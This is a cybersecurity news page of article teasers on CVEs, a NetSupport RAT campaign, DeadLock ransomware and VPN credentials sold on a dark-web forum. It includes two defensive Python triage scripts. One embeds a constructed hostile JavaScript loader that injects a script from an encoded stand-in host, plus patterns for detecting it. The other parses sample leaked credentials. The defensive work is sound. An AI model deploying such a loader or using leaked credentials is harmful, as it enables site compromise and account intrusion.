Red Hot Cyber
Cybersecurity is about sharing. Recognize the risk, combat it, share your experiences, and encourage others to do better than you.

Category: Cybercrime and Darknet

Critical Windows PowerShell Vulnerability CVE-2025-54100: Update Now

An urgent security update has been released to address a vulnerability in Windows PowerShell that allows attackers to execute malicious code on affected systems. The flaw, designated CVE-2025-54100, was disclosed on December 9, 2025, and poses a significant threat to the integrity of computer systems worldwide. Microsoft classifies the vulnerability as Important rather than Critical, with a CVSS severity score of 7.8. The weakness is classified as CWE-77, improper neutralization of special elements used in a command (command injection). Microsoft considers real-world exploitation of this vulnerability unlikely, even though the flaw has already been publicly disclosed. Attackers require

Telegram Losing Ground to Crackdown on Cybercrime Activities

Telegram, which over the course of its history has become one of the most popular messaging apps in the world, is gradually losing its status as a convenient platform for cybercriminals. Kaspersky Lab analysts have monitored the lifecycle of hundreds of underground channels and concluded that stricter moderation is effectively pushing the underground off the platform. Experts point out that Telegram is inferior to dedicated secure messaging apps in terms of privacy protection: chats do not use end-to-end encryption by default, the entire infrastructure is centralized, and the server code is closed. While this probably won’t pose a significant problem for

Notepad++ Vulnerability Fixed: Update to 8.8.9 to Avoid Malware

Notepad++ is often targeted by attackers because the software is popular and widely used. A recently discovered vulnerability in the open-source text and code editor could allow an attacker who is able to intercept network traffic to hijack the update process and install malware on affected computers. The flaw has now been fixed in Notepad++ version 8.8.9. Users running older versions should update to 8.8.9 and immediately run a thorough scan with reputable security software: their systems may already be compromised, and in more severe cases a complete reinstallation may be the only reliable remedy. According to the developers, the Notepad++ update utility, WinGUp, could, under certain circumstances, be

NetSupport RAT Malware Campaign Uncovered: Expert Analysis

Securonix specialists have discovered a multi-layered malware campaign aimed at covertly installing the NetSupport RAT remote access tool. The attack involves a series of carefully hidden stages, each designed to maximize stealth and leave minimal traces on the compromised device. The initial download of the malicious code begins with a JavaScript file injected into compromised websites. This script has a complex structure and hidden logic that is activated only when certain conditions are met. It can detect the user’s device type and even record whether this is their first visit to the page, allowing it to perform malicious actions only
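The teaser above describes a loader that gates its behaviour on the visitor's device type, remembers whether the visitor has been seen before, and only then pulls in the next stage. The following is an added example, not Securonix's or Red Hot Cyber's code, of how a defender might triage inline scripts on a site for that combination of traits. The HTML page and the regular expressions are constructed for illustration and are not indicators of compromise for the real campaign; the three trait categories are an assumption drawn from the behaviour the teaser describes.

```python
"""Heuristic triage of inline <script> blocks for the traits the article
attributes to the loader: device/user-agent gating, a first-visit marker,
and dynamically evaluated or injected code.  Added example; the sample
page and the patterns below are constructed, not real campaign IOCs."""
import re
from html.parser import HTMLParser

# Constructed sample page: one benign analytics-style snippet and one
# script that combines all three loader traits.  The base64 string is a
# constructed https://example.invalid/... URL, not a real payload host.
SAMPLE_HTML = """
<html><body>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
</script>
<script>
  if (!/Android|iPhone/i.test(navigator.userAgent) && !localStorage.getItem("_v1")) {
    localStorage.setItem("_v1", "1");
    var s = document.createElement("script");
    s.src = atob("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvbG9hZGVyLmpz");
    document.head.appendChild(s);
  }
</script>
<script src="/static/app.js"></script>
</body></html>
"""

# Assumed trait categories; each maps to constructed regexes.  This is a
# triage aid to prioritise manual review, not a detection signature.
TRAITS = {
    "device_gating": [r"navigator\.userAgent", r"navigator\.platform",
                      r"/Android|iPhone"],
    "first_visit_marker": [r"localStorage\.(get|set)Item", r"document\.cookie",
                           r"sessionStorage"],
    "dynamic_code": [r"\beval\s*\(", r"\batob\s*\(", r"\bFunction\s*\(",
                     r"createElement\(\s*['\"]script['\"]\s*\)"],
}


class ScriptCollector(HTMLParser):
    """Collects the bodies of inline <script> elements (external src-only
    scripts have an empty body and are skipped)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            body = "".join(self._buf).strip()
            if body:
                self.scripts.append(body)


def inline_scripts(html: str) -> list[str]:
    parser = ScriptCollector()
    parser.feed(html)
    return parser.scripts


def score_script(js: str) -> dict[str, list[str]]:
    """Return the traits present in one script and the patterns that fired."""
    hits = {}
    for trait, patterns in TRAITS.items():
        matched = [pat for pat in patterns if re.search(pat, js)]
        if matched:
            hits[trait] = matched
    return hits


def suspicious_scripts(html: str, min_traits: int = 3):
    """Index and trait list of every inline script showing >= min_traits traits.
    Requiring all three keeps ordinary analytics and consent scripts out."""
    results = []
    for idx, js in enumerate(inline_scripts(html)):
        hits = score_script(js)
        if len(hits) >= min_traits:
            results.append((idx, sorted(hits)))
    return results


if __name__ == "__main__":
    for idx, traits in suspicious_scripts(SAMPLE_HTML):
        print(f"inline script #{idx} matches traits: {', '.join(traits)}")
```

Run it over the HTML of a page you suspect was tampered with; scripts that hit all three categories are worth pulling apart by hand, while a single hit (a real analytics tag reading `navigator.userAgent`, for instance) is not evidence of anything on its own.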

Digital Stress: How to Achieve Balance in a Hyper-Connected World

We live in dissociation: we praise work-life balance, yet we find ourselves constantly online, like puppets on invisible strings. The real problem is not technology, but how we, as humans, respond to it. What we call digital stress isn’t just an annoyance; it’s a profound crisis that affects our well-being, our identity, and our awareness. Digital Stress: The Core of the Problem. Let’s explore each aspect to better understand how it works. Physiological Level: when we receive a notification on our device, our fight-or-flight response is activated. This constant attentional switching causes a chronic increase in cortisol, the stress hormone, as evidenced

DeadLock Ransomware Exploits Baidu Antivirus Vulnerability for EDR Bypass

Cisco Talos has identified a new ransomware campaign called DeadLock: the attackers exploit a vulnerable Baidu antivirus driver (CVE-2024-51324) to disable EDR systems using the Bring Your Own Vulnerable Driver (BYOVD) technique. The group does not operate a data leak site and instead communicates with victims via Session Messenger. According to Talos, the attacks are carried out by a financially motivated operator who gains access to the victim’s infrastructure at least five days before encryption and gradually prepares the environment for the DeadLock deployment. One of the key elements of the chain is BYOVD: the attackers themselves bring in a legitimate but vulnerable

VPN Credentials on the Dark Web: A Growing Cybersecurity Threat

In the darkest corners of the internet, the trafficking of stolen data and unauthorized access continues to thrive. A recent post on a closed underground forum offers 896 FortiSSL VPN credentials, complete with IP address and clear-text passwords, for a combined price of $3,000. The post in the underground and the latent threat: the ad, posted by a forum user, lists available logins for several countries, including the United States, Germany, Austria, Singapore, Japan, South Korea, Italy, the United Arab Emirates, Brazil, Switzerland, and France. The details are provided in the traditional ip:port user:password format, easily usable
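When a dump like the one described above circulates, the first question for a defender is whether any of the listed endpoints sit in their own address space. The following is an added example, not code from the forum post or from Red Hot Cyber, that parses lines in the `ip:port user:password` layout the teaser describes, matches them against the organisation's own CIDR ranges, and reports hits with the password masked so the clear-text secret never lands in a ticket or SIEM event. The dump lines and the `203.0.113.0/24` range are constructed for illustration; no real credentials appear.

```python
"""Triage a leaked 'ip:port user:password' dump against your own address space.
Added example; the sample lines below are constructed, not from any real leak."""
import ipaddress
import re
from dataclasses import dataclass

# Constructed sample in the layout described in the article (documentation
# ranges only).  The fourth line shows the chatter such posts often contain.
SAMPLE_DUMP = """\
203.0.113.10:10443 jdoe:Winter2024!
198.51.100.7:443 vpnadmin:P@ssw0rd
203.0.113.250:10443 asmith:hunter2
not a credential line
192.0.2.55:4443 svc_backup:backup#1
"""

# Hypothetical: the CIDR blocks the defending organisation owns or fronts VPNs on.
OWN_RANGES = ["203.0.113.0/24"]

# One record per line: IPv4, port, whitespace, user, colon, password.
LINE_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d{1,5})\s+"
    r"(?P<user>[^:\s]+):(?P<password>\S+)\s*$"
)


@dataclass(frozen=True)
class LeakedCred:
    ip: ipaddress.IPv4Address
    port: int
    user: str
    password: str


def parse_dump(text: str) -> list[LeakedCred]:
    """Parse every well-formed record; malformed or chatter lines are skipped."""
    creds = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        try:
            ip = ipaddress.IPv4Address(m["ip"])  # rejects octets > 255
        except ipaddress.AddressValueError:
            continue
        port = int(m["port"])
        if not 1 <= port <= 65535:
            continue
        creds.append(LeakedCred(ip, port, m["user"], m["password"]))
    return creds


def mask_password(pw: str) -> str:
    """Keep first and last character so an analyst can confirm a match without
    the full clear-text secret being written anywhere."""
    if len(pw) <= 2:
        return "*" * len(pw)
    return pw[0] + "*" * (len(pw) - 2) + pw[-1]


def find_own_exposures(creds, own_ranges):
    """Records whose IP falls inside any of the organisation's CIDR ranges."""
    nets = [ipaddress.ip_network(r) for r in own_ranges]
    return [c for c in creds if any(c.ip in n for n in nets)]


def report(creds, own_ranges) -> list[str]:
    """Masked, one-line-per-hit summary suitable for an incident ticket."""
    return [
        f"{c.ip}:{c.port} {c.user}:{mask_password(c.password)}"
        for c in find_own_exposures(creds, own_ranges)
    ]


if __name__ == "__main__":
    for line in report(parse_dump(SAMPLE_DUMP), OWN_RANGES):
        print("EXPOSED:", line)
```

Every hit should trigger a forced password reset and a review of that account's recent VPN sessions; the IP:port pairs are also worth checking against your own inventory, since a listing for an address you no longer recognise usually means a forgotten appliance is still reachable.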

Uncovering Russia’s Cyber Operations: CISM’s Role in DDoS Attacks

What we wrote in the article “Patriotic Code: from DDoSia and NoName057(16) to CISM, the algorithm that shapes youth for Putin” on Red Hot Cyber on July 23rd is now fully consistent with the information made public by the United States Department of Justice. Back in July we described how DDoSia worked and the role of NoName057(16) in recruiting volunteers for DDoS attacks via Telegram, highlighting how behind what appeared to be “patriotic cyber-volunteering” there was centralized coordination and infrastructure attributable to figures linked to CISM, a pro-Russian government body. Today’s

Microsoft Outlook RCE Vulnerability: Update Now to Prevent Attacks

Microsoft has patched a critical remote code execution (RCE) vulnerability in Outlook that could allow attackers to run malicious code on vulnerable systems. The vulnerability, tracked as CVE-2025-62562, stems from a use-after-free bug in Microsoft Office Outlook and has a CVSS severity score of 7.8. The attack vector is local and requires user interaction: the attacker must trick a user into interacting with a malicious email, for example by responding to a spoofed message, which triggers the code execution chain. A vulnerability that requires user interaction: according to Microsoft, it is critical that organizations prioritize installing available

Google Chrome Urgent Update Fixes Zero-Day Vulnerability

Google has released an urgent update for the Stable channel of Chrome for desktop to address a serious vulnerability that is currently being exploited in the wild. The update, which brings the browser to version 143.0.7499.109/.110, fixes three security vulnerabilities, including a zero-day tracked as issue 466192044. Unusually, Google has kept the details of its CVE identifier under wraps, simply listing it as “Coordinating.” Google also fixed two other medium-severity vulnerabilities reported by external security researchers, for which a total of $4,000 was awarded under the bug bounty program. They are: Returning to the previous vulnerability without a